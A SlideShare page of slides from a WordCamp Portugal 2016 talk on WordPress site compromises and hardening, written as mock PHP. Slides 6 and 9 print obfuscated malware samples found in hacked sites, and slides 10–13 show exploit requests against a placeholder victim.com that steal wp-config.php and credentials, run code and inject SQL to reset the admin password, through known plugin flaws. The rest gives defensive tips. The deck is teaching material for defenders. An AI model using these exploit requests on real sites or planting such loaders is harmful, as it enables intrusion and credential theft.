SlideShare uses cookies to improve functionality and performance, and to provide you with relevant advertising. If you continue browsing the site, you agree to the use of cookies on this website. See our User Agreement and Privacy Policy.
SlideShare uses cookies to improve functionality and performance, and to provide you with relevant advertising. If you continue browsing the site, you agree to the use of cookies on this website. See our Privacy Policy and User Agreement for details.
Successfully reported this slideshow.
Activate your 14 day free trial to unlock unlimited reading.
Slides from my talk @ aWordCamp Portugal 2016 about hellodev's experience concerning self-hosted WordPress websites and all the security issues around it. Tips and other useful information inside.
Slides from my talk @ aWordCamp Portugal 2016 about hellodev's experience concerning self-hosted WordPress websites and all the security issues around it. Tips and other useful information inside.
4.
/* Primeiros contactos com sites
comprometidos */
-rw-r--r-- 1 root root 3012 May 11 09:59 index.php
/* Source: Wordfence March 2016 */
5.
/* Primeiros contactos com sites
comprometidos */
<?php
// Silence is golden.
6.
/* Primeiros contactos com sites
comprometidos */
<?php
// Silence is golden.
$x =“NFbkn
veorgASDgaskdhfkashdfpwehibvasipdhvaipegaiweHFAPEIgaPIyeiaaipwehgwEG
$34h293gHW)EHG(QHgQ(WEGH#$)GhQªGH)EHGQ3223nfk2n3f23nçkfn2ç34”;
$r=eval(gzinflate(str_rot13(base64_decode($x))));
7.
/* Como uma instalação de
WordPress pode ser
comprometida */
// RESPONSIBLE FOR 70% OF THE ATTACKS
$first =“plugin”;
$second =“brute force”;
// OTHER 30%
$other = array(“code”, ”theme”, ”hosting”, ”file permissions”);
/* Source: Wordfence March 2016 */
8.
/* O que fazem depois? */
// MOST OF THEM
$first_choice =“deface or take offline”;
$second_choice =“send spam”;
$third_choice =“seo spam”;
$other =“redirect”;
/* Source: Wordfence March 2016 */
9.
/* Site comprometido por um
plugin */
// MOST COMMON METHOD
$using_method =“Local File Inclusion (LFI) attack.”;
// EXAMPLE - INJECTED CODE
<?php ${“Gx4cOx42x41x4cx53"}["x69wirx72x63x66x76"]="x69";${"x47Lx4fx42ALx53"}
["x61rx6bmx64z"]="mx6bx41x72r";${"x47x4cOx42x41x4cS"}["ex6ax71x68x68j
x6c"]="x6dx6bx5ftx65x6dp";${"GLOx42x41x4cx53"}["x72x66lx73x65x76x68m
x67x68x79"]="x73tx72x69x70Ax72x72";${"Gx4cx4fx42x41x4cx53"}["v
x72x72x71x78x6dx6dx77y"]="x63ax74x5fcross";${"x47x4cx4fx42ALx53"}
["x72x73x77x70x61x6cx78tx62x79n"]="tex6dx70lx61te";${"GLx4fx42Ax4cx53"}["g
x78x67ycx74x71x73"]="tx69tlx65"; ?>
10.
/* Site comprometido por um
plugin */
// EXAMPLE - DOWNLOAD WP-CONFIG.PHP FILE - REVSLIDER
$wpconfig_content = file_get_contents(“http://victim.com/wp-admin/admin-
ajax.php?action=revslider_show_image&img=../wp-config.php”);
/* Source: http://finalphoenix.me/ */
11.
/* Site comprometido por um
plugin */
// EXAMPLE - PHPINFO WITH CONSTANTS OR DOWNLOADING BACKUPS OR
UPLOADING FILES
$nonce = file_get_contents(“http://victim.com/wp-admin/admin.php?
action=upgrade-plugin”);
$credentials = file_get_contents(“http://victim.com/wp-admin/admin.php?
action=updraft_ajax_handler&nonce=$nonce”);
/* Source: http://finalphoenix.me/ */
12.
/* Site comprometido por um
plugin */
// EXAMPLE - EXECUTING SCRIPTS
$script_to_execute =“phpinfo()”;
$content_of_phpinfo = file_get_contents(“http://victim.com/wp-admin/
admin-post.php?action=wp_ajax_easymedia_imgresize_ajax?imgurl=
$script_to_execute”);
/* Source: http://finalphoenix.me/ */
13.
/* Site comprometido por um
plugin */
// EXAMPLE - DATABASE INJECTION (MISSING ASCII TO HTML CODE CONVERSION)
$context = …
$query_to_inject =“update wp_users set password=md5(‘123’) where id=1”;
$chage_password = file_get_contents(“http://victim.com/wp-admin/admin.php?
page=aiowpsec&tab=tab1&orderby=$query_to_inject”, false, $context);
/* Source: http://finalphoenix.me/ */
14.
/* Site comprometido por um
plugin */
// HOW TO PROTECT AGAINST ATTACKS THROUGH PLUGINS?
$simple_solution =“update, update, update!”;
$other_tips = array (“dont use old plugins”,“search for news about security
issues”,“take a look at the code”);
15.
/* Site comprometido por brute
force */
// PASSWORD GUESSING ATTACK
$tips = array(“dont user obvious usernames”,“dont use simple passwords”,“create a new admin
account”);
$how_to_avoid =“two factor authentication”;
$other_solution = array(“change /wp-admin”,“blacklist IPs trying to login and failing for more than
x times”);
16.
/* Site comprometido por outros
motivos */
// SET THE CORRECT PERMISSIONS
$folders =“0755”;
$files =“0644”;
$wp_config =“0444”;
$htaccess =“0444”;
17.
/* Site comprometido por outros
motivos */
// SET THE CORRECT .HTACCESS CONTENT
$things_you_can_do = array(“block IPs”,“protect files”,“allow certain file
extensions from wp_content/*”);
18.
/* Site comprometido por outros
motivos */
// HAVE LATEST OS UPDATES INSTALLED
if ($i_have_a_server() == true) { update_os(); }